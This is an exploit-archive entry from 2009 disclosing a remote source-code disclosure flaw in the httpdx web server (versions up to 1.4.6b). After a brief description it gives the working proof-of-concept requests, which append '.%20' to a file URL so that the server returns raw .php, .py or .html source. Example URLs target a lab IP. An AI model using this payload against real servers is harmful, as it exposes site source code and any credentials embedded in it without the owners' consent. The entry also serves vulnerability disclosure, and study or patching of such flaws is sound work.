[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : httpdx <= 1.4.6b source disclosure
# Published : 2009-10-21
# Author : Dr_IDE
# Previous Title : Joomla Fastball component 1.1.0-1.2 SQL Injection
# Next Title : Boxalino 09.05.25-0421 Directory Traversal
################################################
#
# httpdx <= 1.4.6b Remote Source Disclosure
# Found By: Dr_IDE
# Tested On: Windows XPSP3
# Download: httpdx.sourceforge.net/downloads/
#
################################################
- Description -
httpdx Web Server <= 1.4.6b is a Windows based HTTP server. This is the latest
version of the application available.
httpdx is vulnerable to remote arbitrary source code disclosure by the following means.
- Technical Details -
http://[ webserver IP]/[ file ][.%20]
http://172.16.2.101/index.html.%20
http://172.16.2.101/test.py.%20
http://172.16.2.101/test.php.%20
#[pocoftheday.blogspot.com]